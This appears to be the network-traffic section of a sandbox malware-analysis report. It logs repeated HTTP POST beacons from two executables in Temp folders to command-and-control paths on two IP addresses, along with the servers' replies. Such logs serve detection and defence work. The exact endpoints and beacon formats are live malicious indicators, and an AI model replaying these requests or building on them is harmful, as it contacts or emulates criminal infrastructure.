Jul 26, 2024 17:57:51.133531094 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:51.384054899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	61345	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:51.000924110 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:51.747025013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:51.764076948 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:52.032738924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	61351	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:51.532921076 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:52.284406900 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:52.287417889 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:52.543869972 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	61356	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:52.184592009 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:53.063016891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:53.174961090 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:53.427489996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	61361	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:52.849997997 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:53.636223078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:53.679874897 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:53.932761908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	61376	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:53.718838930 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:54.531826019 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:54.535419941 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:54.847651005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	61380	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:54.334419966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:56.160712004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.161533117 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:56.163259029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.163925886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.166405916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.682277918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	61389	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:54.966584921 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:56.165370941 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.166245937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.170319080 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:56.414031029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:56.686770916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	61407	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:56.815617085 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:57.607932091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:57.617690086 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:57.868762970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	61408	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:56.815781116 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:57.609551907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:57.618124008 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:57.870825052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	61422	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:58.049474955 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:58.829725027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:58.832087040 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:59.109299898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	61423	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:58.049655914 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:58.881716967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:58.882386923 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:59.142431974 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	61434	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:59.229515076 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
